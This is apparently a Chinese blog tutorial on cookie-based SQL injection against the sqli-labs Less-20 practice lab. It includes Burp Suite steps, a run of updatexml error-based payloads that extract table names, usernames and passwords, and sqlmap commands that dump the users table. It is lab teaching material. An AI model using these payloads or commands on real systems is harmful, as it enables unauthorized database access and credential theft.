MySQL cookie注入
MySQL cookie注入
1.cookie介绍
服务器可以利用cookie
包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP
传输中的状态。cookie
最典型的应用是判定注册用户是否已经登录网站。
用户可能会在一段时间内在同一网站的不同页面中选择不同的商品吗,这些信息都会写cookie
,以便在最后付款时提取信息。
我们按下F12
,选择控制台,在命令行中输入document.cookie
,回车即可得到我们本地的cookie
2.cookie注入代码分析
代码中使用cookie
传递参数,但是没有对cookie
中传递的参数进行过滤操作。导致SQL注入漏洞的产生。
用户传入进来的cookie,是可控的,并且还可以执行SQL语句
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
我们可以闭合前面的单引号,然后执行我们想要执行的SQL语句
3。cookie注入利用
我们以sql-lab-less20为例
1.输入用户名和密码进行抓包
2.发送到repeater
,go
,查看response
,点击Follow redirection
3.返回到Proxy
4.点击Forward
进行两次放包
5.可以看到此时的cookie
为uname=admin
,我们还是重复上面的操作,将数据包发送至Repeater
6.go
一下,查看返回的数据
7.在用户名后面加上反斜杠,查看报错信息
8.利用’ or 1=1 --+输出第一个用户名和密码。
9.爆破数据库
' and updatexml(1,concat(0x7e,database(),0x7e),1) --+
10.爆破数据表
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
我们要的是users
表,因此,往后依次爆破即可
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1) --+
12.爆破字段名
' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1) --+
14.有爆字段可知,此处有三个字段,我们只需,以此爆破即可,而我们关注的是用户名和密码
获取用户名信息
' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+
获取密码信息
' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+
4.sqlmap安全测试
sqlmap cookie注入
1.抓取数据包,并且在cookie后面加上星号(*)
2.cookie注入渗透测试
python2 sqlmap.py -r "1.txt" --level 3 --batch
3.爆破数据库
python2 sqlmap.py -r "1.txt" --level 3 --batch --dbs
4.爆破数据表
python2 sqlmap.py -r "1.txt" --level 3 --batch -D security --tables
5.爆破字段及内容
python2 sqlmap.py -r "1.txt" --level 3 --batch -D security -T users --dump
MySQL cookie注入相关推荐
- MySQL注入读写文件、HTTP头中的SQL注入和cookie注入
MySQL注入读写文件 MySQL数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(前提是权限足够) 读取前提: 1.用户权限足够高,尽量具有root权限 2. ...
- 【CyberSecurityLearning 60】ACCESS数据库的注入+ACCESS数据库的cookie注入
目录 ACCESS注入 雷驰新闻系统v1.0环境搭建: ACCESS数据库注入演示1: 雷驰新闻系统v3.0环境搭建: cookie注入演示2: ACCESS数据库注入用sqlmap怎么做?演示: A ...
- 【渗透测试】cookie注入笔记
目录 什么是cookie? 什么是cookie注入? Cookie手注流程 一.判断注入点 二.判断字段数 三.判断回显点 四.查询相关内容 补充 答疑 1.为什么是select 1,2 不是 sel ...
- Access数据库——Cookie注入
目录 1.Cookie注入 什么是Cookie? Cookie注入简介 Cookie和注入有什么关系? Cookie的核心 2.如何设置Cookie? 方法一:依靠浏览器进行设置 方法二:抓包直接修改 ...
- SQL注入第二章节MYSQL手工注入
SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...
- (17)网络安全:cookie注入、二次注入、DNSlog注入、中转注入、堆叠注入的原理及注入过程
目录 cookie注入 sqli-lasb-master less-21 方法一:用burpsuite进行抓包后修改 方法二:安装火狐的cookie manager等插件进行修改cookie 第一步: ...
- mysql sql注入很常用_常见sql注入的类型
这里只讲解sql注入漏洞的基本类型,代码分析将放在另外一篇帖子讲解 目录 最基础的注入-union注入攻击 Boolean注入攻击-布尔盲注 报错注入攻击 时间注入攻击-时间盲注 堆叠查询注入攻击 二 ...
- mysql sql注入例子_SQL注入的实际案例
发动SQL注入要做的三件事 确定Web应用程序所使用的技术 为了确定所采用的技术,攻击者可以考察Web页面的页脚,查看错误页面,检查页面源代码,或者使用诸如Nessus.AWVS.APPSCAN等工具 ...
- mysql手工注入imformation_SQL 注入总结
0x01 什么是SQL注入 sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术. 0x02 SQL注入的分类 按变量类型分 数字型 字符型 按HTTP提交方式分 G ...
最新文章
- android studio 导入库提示失败的处理方法以及androidstudio 清理缓存的方法
- 雷军做程序员时写的文章,太牛了!
- 用户看法调查结果及分析(四)
- 【Qt】DOM创建和操作XML文档
- HelloWorld CMake Demo 03:CMake中构建静态库与动态库及其使用
- 进程返回linux系统编程之管道(二):管道读写规则和Pipe Capacity、PIPE_BUF
- 第 十 一 天 : 复 习 完 ( 四 )
- 机器学习模型的性能指标
- c语言指针++_C ++此指针| 查找输出程序| 套装3
- 计算机组成原理双端口存储器实验,计算机组成原理双端口存储器实验报告.doc...
- 'htmlentities(): charset `utf8' not supported, assuming utf-8'
- Iplat 4J 6.2 常见问题
- python怎么导入csv文件数据-机器学习Python实践——数据导入(CSV)
- WebView的简单使用
- 射极跟随器负载加重解析
- 八种样本抽样方法介绍
- Android 3D 旋转
- 电脑怎么用计算机打开指令,命令提示符怎么用 命令提示符快捷键打开使用技巧详解...
- sqldbx怎么连接远程服务器,SqlDbx连接远程DB2数据库
- 小暑调养宝宝身体的五个方法
热门文章
- 和府捞面上海单城破100家店;Gap品牌推出家居产品 | 知消
- Linux- 初识man、info
- win10/11彻底关闭自动更新
- java中thread类定义在哪个包中,Thread类位于下列哪个包中?()A、javA、ioB、javA、langC、j......
- org.junit.Assert中的assertEquals(long,long)
- python抓取文本字段_使用Python提取文本中含有特定字符串的方法示例
- win10虚拟机监控服务器,Windows虚拟机监控程序必须正在运行
- C++ 中的万能引用、引用折叠、完美转发
- 请求重定向与转发的区别
- 上拉电阻和下拉电阻的区别